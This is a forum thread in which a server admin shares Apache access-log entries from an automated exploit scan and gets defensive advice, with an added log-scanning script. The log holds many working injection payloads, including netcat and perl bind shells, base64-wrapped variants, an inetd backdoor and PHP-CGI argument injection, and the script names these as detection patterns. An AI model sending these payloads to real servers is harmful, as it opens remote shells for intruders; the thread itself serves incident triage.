LinuxQuestions.org
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Old 11-13-2012, 03:35 AM   #1
alxkls
LQ Newbie
 
Registered: Nov 2012
Posts: 3

Rep: Reputation: Disabled
Apache and PHP security issue


While looking at the apache logs this morning I noticed a few that concerned me. They were encoded and didn't look like any of the code I wrote so I checked them out and this is what I found:
Code:
/?-d allow_url_include=ON --define safe_mode=FAlSE -d suhosin.simulation=on --define disable_functions="" --define open_basedir=none --define auto_prepend_file=php://input -n  

 /?search[send][]=eval&search[send][]=Kernel.fork do`nc -lp 27796 -e /bin/sh`end
I'm not quite sure how this works, but since I do realize what nc -lp would have been used for, I'm not exactly glad to see all this. Which is what brings me here... suggestions what to do?
 
Old 11-13-2012, 10:50 AM   #2
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,826
Blog Entries: 54

Rep: Reputation: 2992
Quote:
Originally Posted by alxkls View Post
Code:
/?-d allow_url_include=ON (..)
what to do?
That's CVE-2012-1823, see http://www.linuxquestions.org/questi...4/#post4692267. Reading the links in the linked documents shows you what actions to perform, the first and most important of which is checking your PHP version and upgrading it if vulnerable.
 
Old 11-13-2012, 11:33 AM   #3
alxkls
LQ Newbie
 
Registered: Nov 2012
Posts: 3

Original Poster
Rep: Reputation: Disabled
Yes, I did find a few topics regarding similar issues. But according to the www that has been fixed as of PHP 5.3.0, and I am using 5.3.3, so technically this shouldn't be an issue. The one that worries me more is the second one. I couldn't find pretty much any useful information about it except that it is used in Metasploit software. I tried performing the same actions myself in the same order as the ones listed in the Apache logs and by the looks of it they did not appear to do anything, but I am not 100% sure about it; as I said, this isn't documented anywhere.
 
Old 11-13-2012, 12:06 PM   #4
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,826
Blog Entries: 54

Rep: Reputation: 2992
Quote:
Originally Posted by alxkls View Post
I am using 5.3.3 so technically this shouldn't be an issue.
Should've said that in your OP.


Quote:
Originally Posted by alxkls View Post
by the looks of it they did not appear to do anything but I am not 100% sure
- If the return code shows nothing in your web stack is susceptible to that kind of attack,
- if there aren't any rogue processes (or web server DSOs!) on the server,
- if there aren't any foreign objects in any directory the web server can write to or read from,
- if there aren't stray error messages in the web server's access and error logs,
- if whatever you provide in your web stack doesn't run obsolete software / plugin versions,
- if people aren't able to pull off .htaccess or php.ini tricks to disable or circumvent restrictions,
then you've checked things and can be reasonably certain it's all good.
That doesn't mean you shouldn't invest in hardening and auditing though.
Any questions about the latter should be accompanied by a list of what you did already.
 
Old 11-13-2012, 02:39 PM   #5
alxkls
LQ Newbie
 
Registered: Nov 2012
Posts: 3

Original Poster
Rep: Reputation: Disabled
Well, after finally getting the chance to sit at my computer at home and investigate (using my phone was a nightmare), I discovered the following:
Both commands did not do anything that concerns me in any way. They did nothing. No unfamiliar processes, no error messages, php.ini is fine and all is running well.

It turns out that this is not likely to be human after examining the access log:
Code:
**.***.**.*** - - [13/Nov/2012:07:53:24 +0300] "GET / HTTP/1.0" 200 5586
**.***.**.*** - - [13/Nov/2012:07:56:46 +0300] "GET /phptax/drawimage.php?pdf=make&pfilez=xxx%3b%20perl%20-MIO%20-e%20%27%24p%3dfork%28%29%3bexit%2cif%24p%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28LocalPort%2c17553%2cReuse%2c1%2cListen%29-%3eaccept%3b%24%7e-%3efdopen%28%24c%2cw%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3bsystem%24%5f%20while%3c%3e%27 HTTP/1.1" 404 295
**.***.**.*** - - [13/Nov/2012:07:56:47 +0300] "POST /pp088/tools/upload_file.php HTTP/1.1" 404 302
**.***.**.*** - - [13/Nov/2012:07:56:48 +0300] "GET /pp088/tools//IETF//DTD HTML 2.0//EN\"> HTTP/1.1" 404 297
**.***.**.*** - - [13/Nov/2012:07:57:34 +0300] "POST /Auxiliumpetratepro/admin/sitebanners/upload_banners.php HTTP/1.1" 404 330
**.***.**.*** - - [13/Nov/2012:07:57:34 +0300] "GET /Auxiliumpetratepro/banners/SXIyw.php HTTP/1.1" 404 311
**.***.**.*** - - [13/Nov/2012:07:58:08 +0300] "POST /xoda/?upload HTTP/1.1" 404 280
**.***.**.*** - - [13/Nov/2012:07:58:28 +0300] "GET /cgi-bin/learn-msg.cgi?id=%7cperl%20-MIO%20-e%20%27%24p%3dfork%28%29%3bexit%2cif%24p%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28LocalPort%2c15235%2cReuse%2c1%2cListen%29-%3eaccept%3b%24%7e-%3efdopen%28%24c%2cw%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3bsystem%24%5f%20while%3c%3e%27%3b HTTP/1.1" 404 296
**.***.**.*** - - [13/Nov/2012:07:58:46 +0300] "POST /testlink-1.9.3/firstLogin.php HTTP/1.1" 404 304
**.***.**.*** - - [13/Nov/2012:07:59:08 +0300] "POST /WANem/result.php HTTP/1.1" 404 291
**.***.**.*** - - [13/Nov/2012:07:59:26 +0300] "GET /mobilecartly/includes/savepage.php?savepage=PyAyR.php&pagecontent=%3c%3fphp%20system%28base64%5fdecode%28%27cGVybCAtTUlPIC1lICckcD1mb3JrKCk7ZXhpdCxpZiRwOyRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw4NTE3LFJldXNlLDEsTGlzdGVuKS0%2bYWNjZXB0OyR%2bLT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTtzeXN0ZW0kXyB3aGlsZTw%2bJw%3d%3d%27%29%29%3bunlink%28%5f%5fFILE%5f%5f%29%3b%20%3f%3e HTTP/1.1" 404 309
**.***.**.*** - - [13/Nov/2012:07:59:27 +0300] "GET /mobilecartly/pages/PyAyR.php HTTP/1.1" 404 303
**.***.**.*** - - [13/Nov/2012:07:59:48 +0300] "POST /cuteflow_v.2.11.2/pages/restart_circulation_values_write.php HTTP/1.1" 404 335
**.***.**.*** - - [13/Nov/2012:07:59:48 +0300] "GET /cuteflow_v.2.11.2/upload/___1/MfY6uV.php HTTP/1.1" 404 315
**.***.**.*** - - [13/Nov/2012:08:00:09 +0300] "GET /spywall/pbcontrol.php?filename=oZbb%22%3bperl%20-MIO%20-e%20%27%24p%3dfork%28%29%3bexit%2cif%24p%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28LocalPort%2c21824%2cReuse%2c1%2cListen%29-%3eaccept%3b%24%7e-%3efdopen%28%24c%2cw%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3bsystem%24%5f%20while%3c%3e%27%3b%22&stage=0 HTTP/1.1" 404 296
**.***.**.*** - - [13/Nov/2012:08:00:31 +0300] "POST /www/work/resultimage.php HTTP/1.1" 404 299
**.***.**.*** - - [13/Nov/2012:08:00:31 +0300] "GET /www/results/blah.php HTTP/1.1" 404 295
**.***.**.*** - - [13/Nov/2012:08:00:50 +0300] "POST /sample/egallery/uploadify.php HTTP/1.1" 404 304
**.***.**.*** - - [13/Nov/2012:08:01:06 +0300] "POST /sflog/admin/login.php HTTP/1.1" 404 296
**.***.**.*** - - [13/Nov/2012:08:01:21 +0300] "GET /tiki/tiki-rss_error.php HTTP/1.1" 404 298
**.***.**.*** - - [13/Nov/2012:08:02:01 +0300] "GET //basilic-1.5.14//Config/diff.php?file=%26perl%20-MIO%20-e%20%27%24p%3dfork%28%29%3bexit%2cif%24p%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28LocalPort%2c30526%2cReuse%2c1%2cListen%29-%3eaccept%3b%24%7e-%3efdopen%28%24c%2cw%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3bsystem%24%5f%20while%3c%3e%27%20%23&new=1&old=2 HTTP/1.1" 404 306
**.***.**.*** - - [13/Nov/2012:08:02:58 +0300] "POST /wp-content/plugins/foxypress/uploadify/uploadify.php HTTP/1.1" 404 327
**.***.**.*** - - [13/Nov/2012:08:03:36 +0300] "GET /bf102/index.php HTTP/1.1" 404 290
**.***.**.*** - - [13/Nov/2012:08:06:26 +0300] "POST /spywall/ipchange.php HTTP/1.1" 404 295
**.***.**.*** - - [13/Nov/2012:08:06:27 +0300] "POST /spywall/blocked_file.php HTTP/1.1" 404 299
**.***.**.*** - - [13/Nov/2012:08:06:29 +0300] "GET /spywall/login.php HTTP/1.1" 404 292
**.***.**.*** - - [13/Nov/2012:08:07:23 +0300] "POST /?-%64+allow_url_include%3dON+--define+safe_mode%3dFAlSE+-d+suhosin.simulation%3don+--define+disable_functions%3d%22%22+--define+open_basedir%3dnone+--define+auto_prepend_file%3dphp://input+-n++ HTTP/1.1" 200 5586
**.***.**.*** - - [13/Nov/2012:08:07:41 +0300] "POST /WebCalendar-1.2.4/install/index.php HTTP/1.1" 404 310
**.***.**.*** - - [13/Nov/2012:08:07:41 +0300] "GET /WebCalendar-1.2.4/includes/settings.php HTTP/1.1" 404 314
**.***.**.*** - - [13/Nov/2012:08:07:57 +0300] "GET /dolibarr/ HTTP/1.1" 404 284
**.***.**.*** - - [13/Nov/2012:08:08:30 +0300] "POST /horde/services/javascript.php HTTP/1.1" 404 304
**.***.**.*** - - [13/Nov/2012:08:08:49 +0300] "POST /vb/vbseocp.php HTTP/1.1" 404 289
**.***.**.*** - - [13/Nov/2012:08:10:24 +0300] "POST /appRain-q-0.1.5/addons/uploadify/uploadify.php HTTP/1.1" 404 321
**.***.**.*** - - [13/Nov/2012:08:10:26 +0300] "GET /api/project/repo/log/graph/%60%6e%63%2520%2d%6c%70%2520%31%35%35%36%36%2520%2d%65%2520/%62%69%6e/%73%68%60 HTTP/1.1" 404 335
**.***.**.*** - - [13/Nov/2012:08:12:46 +0300] "POST /license.php HTTPS/1.1" 404 286
**.***.**.*** - - [13/Nov/2012:08:12:48 +0300] "POST /op5config/welcome HTTPS/1.1" 404 292
**.***.**.*** - - [13/Nov/2012:08:13:39 +0300] "POST /admincp/plugins.php?newhook HTTP/1.1" 404 294
**.***.**.*** - - [13/Nov/2012:08:13:40 +0300] "GET /index.php HTTP/1.1" 200 5586
**.***.**.*** - - [13/Nov/2012:08:14:19 +0300] "GET /fcms/dev/less.php?argv%5b1%5d=%7cecho%20JuvkyL%3bperl%20-MIO%20-e%20%27%24p%3dfork%28%29%3bexit%2cif%24p%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28LocalPort%2c13951%2cReuse%2c1%2cListen%29-%3eaccept%3b%24%7e-%3efdopen%28%24c%2cw%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3bsystem%24%5f%20while%3c%3e%27%3becho%20DHihiTE%3b%23 HTTP/1.1" 404 292
**.***.**.*** - - [13/Nov/2012:08:14:37 +0300] "POST /vcms/includes/inline_image_upload.php HTTP/1.1" 404 312
**.***.**.*** - - [13/Nov/2012:08:14:38 +0300] "GET /vcms/temp/MmzFf.php HTTP/1.1" 404 294
**.***.**.*** - - [13/Nov/2012:08:15:31 +0300] "POST /pmwiki.php HTTP/1.1" 404 285
**.***.**.*** - - [13/Nov/2012:08:15:32 +0300] "POST /pmwiki.php HTTP/1.1" 404 285
**.***.**.*** - - [13/Nov/2012:08:15:51 +0300] "GET /phpldapadmin/htdocs/index.php HTTP/1.1" 404 304
**.***.**.*** - - [13/Nov/2012:08:15:51 +0300] "POST /phpldapadmin/htdocs/cmd.php HTTP/1.1" 404 302
**.***.**.*** - - [13/Nov/2012:08:16:09 +0300] "GET /index.php HTTP/1.1" 200 5586
**.***.**.*** - - [13/Nov/2012:08:16:29 +0300] "GET /?search[send][]=eval&search[send][]=Kernel.fork%20do%60%6e%63%20%2d%6c%70%20%32%37%37%39%36%20%2d%65%20/%62%69%6e/%73%68%60end HTTP/1.1" 200 5586
**.***.**.*** - - [13/Nov/2012:08:16:53 +0300] "GET /snortreport-1.3.2/nmap.php?target=127.0.0.1%20%26%26%20echo%20XXXXX%20%26%26%20eval%20%24%28echo%20cGVybCAtTUlPIC1lICckcD1mb3JrKCk7ZXhpdCxpZiRwOyRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCwyNTM3OSxSZXVzZSwxLExpc3RlbiktPmFjY2VwdDskfi0%2bZmRvcGVuKCRjLHcpO1NURElOLT5mZG9wZW4oJGMscik7c3lzdGVtJF8gd2hpbGU8Pic%3d%20%7c%20base64%20-d%29%20%26%26%20echo%20ZZZZZ HTTP/1.1" 404 301
**.***.**.*** - - [13/Nov/2012:08:17:14 +0300] "GET /interface/interface.php?uniqueKey=8005115985971 HTTP/1.1" 404 298
**.***.**.*** - - [13/Nov/2012:08:17:27 +0300] "POST /WeBid/converter.php HTTP/1.1" 404 294
**.***.**.*** - - [13/Nov/2012:08:17:51 +0300] "GET /api/orders.json?search[instance_eval]=Kernel.fork%20do%60%6e%63%20%2d%6c%70%20%31%36%37%32%20%2d%65%20/%62%69%6e/%73%68%60end HTTP/1.1" 404 290
**.***.**.*** - - [13/Nov/2012:08:18:09 +0300] "POST /log1cms2.0/admin/libraries/ajaxfilemanager/ajax_create_folder.php HTTP/1.1" 404 340
**.***.**.*** - - [13/Nov/2012:08:18:10 +0300] "GET /log1cms2.0/admin/libraries/ajaxfilemanager/inc/data.php HTTP/1.1" 404 330
**.***.**.*** - - [13/Nov/2012:08:18:28 +0300] "GET /lcms/ HTTP/1.1" 404 280
**.***.**.*** - - [13/Nov/2012:08:18:54 +0300] "\x16\x03" 200 5586
**.***.**.*** - - [13/Nov/2012:08:19:15 +0300] "GET /projects/1/repository/annotate?rev=`nc%20-lp%2023174%20-e%20/bin/sh` HTTP/1.1" 404 305
**.***.**.*** - - [13/Nov/2012:08:20:04 +0300] "POST / HTTP/1.1" 200 5586
**.***.**.*** - - [13/Nov/2012:08:20:05 +0300] "POST / HTTP/1.1" 200 5586
**.***.**.*** - - [13/Nov/2012:08:20:05 +0300] "GET / HTTP/1.1" 200 5586
**.***.**.*** - - [13/Nov/2012:08:20:57 +0300] "GET /AjaXplorer-2.5.5/plugins/access.ssh/checkInstall.php?destServer=%7c%7cperl%20-MIO%20-e%20%27%24p%3dfork%28%29%3bexit%2cif%24p%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28LocalPort%2c9593%2cReuse%2c1%2cListen%29-%3eaccept%3b%24%7e-%3efdopen%28%24c%2cw%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3bsystem%24%5f%20while%3c%3e%27 HTTP/1.1" 404 327
**.***.**.*** - - [13/Nov/2012:08:21:44 +0300] "POST /catalog/admin/file_manager.php/login.php?action=save HTTP/1.1" 404 315
**.***.**.*** - - [13/Nov/2012:08:21:45 +0300] "GET /catalog/O1oU6.php HTTP/1.1" 404 292
**.***.**.*** - - [13/Nov/2012:08:22:01 +0300] "GET /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder= HTTP/1.1" 404 347
**.***.**.*** - - [13/Nov/2012:08:23:59 +0300] "POST /nagios3/cgi-bin/statuswml.cgi HTTP/1.1" 404 304
**.***.**.*** - - [13/Nov/2012:08:24:14 +0300] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 303
**.***.**.*** - - [13/Nov/2012:08:24:33 +0300] "POST /dogfood/mail/spell.php HTTP/1.1" 404 297
**.***.**.*** - - [13/Nov/2012:08:24:47 +0300] "POST /cgi-bin/ck/mimencode?-u+-o+spamkeeper.dat HTTP/1.1" 404 295
**.***.**.*** - - [13/Nov/2012:08:24:50 +0300] "GET /cgi-bin/ck/spamkeeper.dat HTTP/1.1" 404 300
**.***.**.*** - - [13/Nov/2012:08:25:05 +0300] "POST /phpscheduleit/reserve.php HTTP/1.1" 404 300
**.***.**.*** - - [13/Nov/2012:08:25:24 +0300] "GET /awstatstotals/awstatstotals.php?sort=\"].passthru('echo%20YYY;perl%20-MIO%20-e%20%27%24p%3dfork%28%29%3bexit%2cif%24p%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28LocalPort%2c31455%2cReuse%2c1%2cListen%29-%3eaccept%3b%24%7e-%3efdopen%28%24c%2cw%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3bsystem%24%5f%20while%3c%3e%27;echo%20YYY;').exit().%24a[\" HTTP/1.1" 404 306
**.***.**.*** - - [13/Nov/2012:08:26:05 +0300] "GET /base/base_qry_common.php?BASE_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%33%2e%31%39%38%3a%38%30%38%30%2f%50%34%38%6d%70%6a%54%6a%56%7a%37%3f HTTP/1.1" 404 299
**.***.**.*** - - [13/Nov/2012:08:26:07 +0300] "GET /includes/Cache/Lite/Output.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%33%2e%31%39%38%3a%38%30%38%30%2f%6a%38%41%37%72%49%43%6e%39%6f%3f HTTP/1.1" 404 305
**.***.**.*** - - [13/Nov/2012:08:26:47 +0300] "POST /cpg1414/picEditor.php HTTP/1.1" 404 296
**.***.**.*** - - [13/Nov/2012:08:27:03 +0300] "GET /tikiwiki/tiki-graph_formula.php?w=63&h=863&s=356&min=228&max=238&f[]=x.sqrt.passthru(chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89).chr(59).chr(99).chr(97).chr(116).chr(32).chr(100).chr(98).chr(47).chr(108).chr(111).chr(99).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112).chr(59).chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89))&t=pdf&title= HTTP/1.1" 404 306
**.***.**.*** - - [13/Nov/2012:08:27:03 +0300] "GET /tikiwiki/tiki-graph_formula.php?w=900&h=878&s=137&min=61&max=123&f[]=x.ceil.eval(base64_decode(c3lzdGVtKGJhc2U2NF9kZWNvZGUoJ2NHVnliQ0F0VFVsUElDMW.chr(120).JQ2NrY0Q.chr(120).bWIzSnJLQ2s3WlhocGRDeHBaaVJ3T3lSalBXNW.chr(120).keUJKVHpvNlUyOWphMlYwT2pwSlRrVlVLRXh2WTJGc1VHOXlkQ3c0TkRNMU.chr(120).GSm.chr(120).kWE5sTERFc1RHbHpkR1Z1S1MwK1lXTmpaWEIwT3lSK0.chr(120).UNW1aRzl3Wlc0b0pHTXNkeWs3VTFSRVNVNHRQbVprYjNCbGJpZ2tZeXh5S1R0emVYTjBaVzBrWHlCM2FHbHNaVHcrSnc9PScpKTs))&t=pdf&title= HTTP/1.1" 404 306
**.***.**.*** - - [13/Nov/2012:08:28:05 +0300] "POST /tikiwiki//jhot.php HTTP/1.1" 404 293
**.***.**.*** - - [13/Nov/2012:08:28:06 +0300] "GET /tikiwiki//img/wiki/tiki-config.php HTTP/1.1" 404 309
**.***.**.*** - - [13/Nov/2012:08:28:06 +0300] "GET /tikiwiki//img/wiki/tiki-config.php HTTP/1.1" 404 309
**.***.**.*** - - [13/Nov/2012:08:28:24 +0300] "GET /cgi-bin/awstats.pl?migrate=|echo;echo%20YYY;cd%20/tmp%20%26%26perl%20-MIO%20-e%20%27%24p%3dfork%28%29%3bexit%2cif%24p%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28LocalPort%2c17743%2cReuse%2c1%2cListen%29-%3eaccept%3b%24%7e-%3efdopen%28%24c%2cw%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3bsystem%24%5f%20while%3c%3e%27;echo%20YYY;echo|awstats263220.demo.txt HTTP/1.1" 404 293
**.***.**.*** - - [13/Nov/2012:08:28:38 +0300] "POST /pajax/pajax/pajax_call_dispatcher.php HTTP/1.1" 404 312
**.***.**.*** - - [13/Nov/2012:08:28:54 +0300] "GET /twiki/bin/view/Main/TWikiUsers?rev=20%20%60cp%20/etc/services%20/tmp/.HFJxMMQQkyszWjxPPvuOPrynVPCcIquW%3becho%20koiyoxpfy%2019275/tcp%3e%3e/etc/services%3becho%20koiyoxpfy%20stream%20tcp%20nowait%20root%20/bin/sh%20sh%3e/tmp/.zBjhViiRYeEFtHMKabOfAZnZxTmcSkwY%3binetd%20-s%20/tmp/.zBjhViiRYeEFtHMKabOfAZnZxTmcSkwY%20%7c%7c/usr/sbin/inetd%20-s%20/tmp/.zBjhViiRYeEFtHMKabOfAZnZxTmcSkwY%20%7c%7c/usr/etc/inetd%20-s%20/tmp/.zBjhViiRYeEFtHMKabOfAZnZxTmcSkwY%3bcp%20/tmp/.HFJxMMQQkyszWjxPPvuOPrynVPCcIquW%20/etc/services%3brm%20/tmp/.zBjhViiRYeEFtHMKabOfAZnZxTmcSkwY%20/tmp/.HFJxMMQQkyszWjxPPvuOPrynVPCcIquW%3b%60%23 HTTP/1.1" 404 305
**.***.**.*** - - [13/Nov/2012:08:29:14 +0300] "GET /cgi-bin/img.pl?f=../../../../../../../../bin/sh%20-c%20%22echo%20%27YYY%27%3b%20perl%20-MIO%20-e%20%27%24p%3dfork%28%29%3bexit%2cif%24p%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28LocalPort%2c31031%2cReuse%2c1%2cListen%29-%3eaccept%3b%24%7e-%3efdopen%28%24c%2cw%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3bsystem%24%5f%20while%3c%3e%27%3b%20echo%20%27YYY%27%22%7c HTTP/1.1" 404 289
**.***.**.*** - - [13/Nov/2012:08:30:41 +0300] "GET /OvCgi/connectedNodes.ovpl?node=%3b%20echo%20YYY%3b%20perl%20-MIO%20-e%20%27%24p%3dfork%28%29%3bexit%2cif%24p%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28LocalPort%2c11545%2cReuse%2c1%2cListen%29-%3eaccept%3b%24%7e-%3efdopen%28%24c%2cw%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3bsystem%24%5f%20while%3c%3e%27%3b%20echo%20YYY%7c%20tr%20%22\\n%22%20%22%a3%22 HTTP/1.1" 404 300
**.***.**.*** - - [13/Nov/2012:08:30:43 +0300] "GET /sphpblog/config/password.txt HTTP/1.1" 404 303
**.***.**.*** - - [13/Nov/2012:08:31:26 +0300] "GET / HTTP/1.0" 200 5586
**.***.**.*** - - [13/Nov/2012:08:31:41 +0300] "GET / HTTP/1.1" 200 5586
**.***.**.*** - - [13/Nov/2012:08:31:57 +0300] "POST /xmlrpc.php HTTP/1.1" 404 285
**.***.**.*** - - [13/Nov/2012:08:33:49 +0300] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;perl%20-MIO%20-e%20%27%24p%3dfork%28%29%3bexit%2cif%24p%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28LocalPort%2c29523%2cReuse%2c1%2cListen%29-%3eaccept%3b%24%7e-%3efdopen%28%24c%2cw%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3bsystem%24%5f%20while%3c%3e%27;echo%20YYY;echo| HTTP/1.1" 404 293
**.***.**.*** - - [13/Nov/2012:08:33:51 +0300] "GET /cacti/graph_view.php?action=list HTTP/1.1" 404 295
**.***.**.*** - - [13/Nov/2012:08:35:03 +0300] "GET /twiki/bin/view/Main/WebSearch?search=0sVbp%27%3bcp%24%7bIFS%7d/etc/services%24%7bIFS%7d/tmp/.fykCMfvdCtDwFiDwkTKJlbAardgzUjzA%3becho%24%7bIFS%7dzzkyqkhvv%24%7bIFS%7d10005/tcp%3e%3e/etc/services%3becho%24%7bIFS%7dzzkyqkhvv%24%7bIFS%7dstream%24%7bIFS%7dtcp%24%7bIFS%7dnowait%24%7bIFS%7droot%24%7bIFS%7d/bin/sh%24%7bIFS%7dsh%3e/tmp/.pSyTyCLXGFmdhhuYbfEtDYsXtzmVRqJq%3binetd%24%7bIFS%7d-s%24%7bIFS%7d/tmp/.pSyTyCLXGFmdhhuYbfEtDYsXtzmVRqJq%24%7bIFS%7d%7c%7c/usr/sbin/inetd%24%7bIFS%7d-s%24%7bIFS%7d/tmp/.pSyTyCLXGFmdhhuYbfEtDYsXtzmVRqJq%24%7bIFS%7d%7c%7c/usr/etc/inetd%24%7bIFS%7d-s%24%7bIFS%7d/tmp/.pSyTyCLXGFmdhhuYbfEtDYsXtzmVRqJq%3bcp%24%7bIFS%7d/tmp/.fykCMfvdCtDwFiDwkTKJlbAardgzUjzA%24%7bIFS%7d/etc/services%3brm%24%7bIFS%7d/tmp/.pSyTyCLXGFmdhhuYbfEtDYsXtzmVRqJq%24%7bIFS%7d/tmp/.fykCMfvdCtDwFiDwkTKJlbAardgzUjzA%3b%3b%23%27 HTTP/1.1" 404 304
**.***.**.*** - - [13/Nov/2012:08:35:03 +0300] "GET /phpBB2/viewtopic.php?topic=18 HTTP/1.1" 404 295
**.***.**.*** - - [13/Nov/2012:08:36:11 +0300] "POST /cgi-bin/guestbook.pl HTTP/1.1" 404 295
**.***.**.*** - - [13/Nov/2012:08:36:14 +0300] "GET /guestbook/guestbook.html HTTP/1.1" 404 299
**.***.**.*** - - [13/Nov/2012:08:36:47 +0300] "GET /cgi-bin/generic?cmd=nc%20-lp%2014211%20-e%20/bin/sh HTTP/1.1" 404 290
And none of those holds a potential harm to me so...

Anyways thanks unSpawn
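The triage unSpawn describes in post #4 (does the return code show the request reached anything?) can be applied to a log like the one above mechanically. The following is an added example, not code from the thread or from any of the projects the scanner probed: it parses common-format Apache lines, undoes the single and double percent-encoding and the base64 wrapping the probes use, matches a few signatures taken from this thread (the CVE-2012-1823 `?-d` argv injection, `nc -lp`, the `perl -MIO` bind shell, `Kernel.fork`), and reports whether the hit got a 200 (a live handler answered) or a 404 (the probe hit nothing). The sample lines are constructed after the thread's log with a placeholder address; the base64 blob is the one from the thread, truncated.

```python
import base64
import re
from urllib.parse import unquote

# Constructed sample lines modelled on the thread's access log. 203.0.113.5 is a
# documentation-range placeholder, not the scanner's real address.
SAMPLE_LOG = r'''
203.0.113.5 - - [13/Nov/2012:08:13:40 +0300] "GET /index.php HTTP/1.1" 200 5586
203.0.113.5 - - [13/Nov/2012:08:07:23 +0300] "POST /?-%64+allow_url_include%3dON+--define+auto_prepend_file%3dphp://input+-n HTTP/1.1" 200 5586
203.0.113.5 - - [13/Nov/2012:08:10:26 +0300] "GET /api/project/repo/log/graph/%60%6e%63%2520%2d%6c%70%2520%31%35%35%36%36%2520%2d%65%2520/%62%69%6e/%73%68%60 HTTP/1.1" 404 335
203.0.113.5 - - [13/Nov/2012:07:59:26 +0300] "GET /mobilecartly/includes/savepage.php?pagecontent=%3c%3fphp%20system%28base64%5fdecode%28%27cGVybCAtTUlPIC1lICckcD1mb3JrKCk7ZXhpdCxpZiRwOyRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw4NTE3LFJldXNlLDEsTGlzdGVu%27%29%29%3b%3f%3e HTTP/1.1" 404 309
203.0.113.5 - - [13/Nov/2012:08:18:54 +0300] "\x16\x03" 200 5586
'''

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>.*)" '
                    r'(?P<status>\d{3}) (?P<size>\S+)$')
REQ_RE = re.compile(r'^(?P<method>[A-Z]+) (?P<target>\S+) HTTPS?/\d\.\d$')
# Base64 the probe itself would unpack: base64_decode('...') or echo ... | base64 -d
B64_RE = re.compile(r'''(?:base64_decode\(['"]?|echo\s+)([A-Za-z0-9+/]{16,}={0,2})''')

# Signatures are matched against the fully decoded request target.
SIGNATURES = [
    ("php-cgi argv injection (CVE-2012-1823)",
     re.compile(r'\?-[a-z]\b|\?--define|auto_prepend_file=php://input', re.I)),
    ("bind-shell listener",
     re.compile(r'\bnc\s+-lp\b|perl\s+-MIO|IO::Socket::INET\(LocalPort', re.I)),
    ("shell spawn", re.compile(r'/bin/sh\b|Kernel\.fork', re.I)),
    ("code eval", re.compile(r'\b(eval|passthru|system|base64_decode)\s*\(|instance_eval', re.I)),
]


def decode_target(target):
    """Undo repeated percent-encoding, then append the plaintext of any base64
    blob an embedded decoder call would unpack, so the signatures see it."""
    for _ in range(3):                      # %2520 -> %20 -> ' ' needs two passes
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    for blob in B64_RE.findall(target):
        try:
            target += " " + base64.b64decode(blob, validate=True).decode("latin-1")
        except ValueError:                  # binascii.Error: not real base64
            pass
    return target


def scan_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    req = REQ_RE.match(m["req"])
    if req:
        target = decode_target(req["target"])
        tags = [name for name, rx in SIGNATURES if rx.search(target)]
    else:                                   # e.g. a TLS record sent to the plain-HTTP port
        target, tags = m["req"], ["non-HTTP request line"]
    if not tags:
        return None
    # Status is the triage key from the thread: 404 means the probe hit nothing,
    # 200 means a real handler answered and that request deserves a closer look.
    return {"ip": m["ip"], "status": int(m["status"]),
            "reached_handler": m["status"] == "200", "target": target, "tags": tags}


def scan_log(text):
    """Scan a whole access log; returns only the flagged lines, in order."""
    return [f for f in map(scan_line, text.strip().splitlines()) if f]
```

Run over the thread's own log, only the two `200` hits (the `/?-d` POST and the `search[send][]=eval` GET) would come back with `reached_handler` set, which is exactly the pair worth re-checking against the PHP version and the application behind `/`.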
 
Old 11-17-2012, 04:08 PM   #6
sneakyimp
Member
 
Registered: Dec 2004
Posts: 795

Rep: Reputation: 50
I believe mod_security can help protect against this kind of attack. I've had problems with it before -- a filter was interfering with normal website behavior -- but it looks to me like it filters a large number of attacks.
 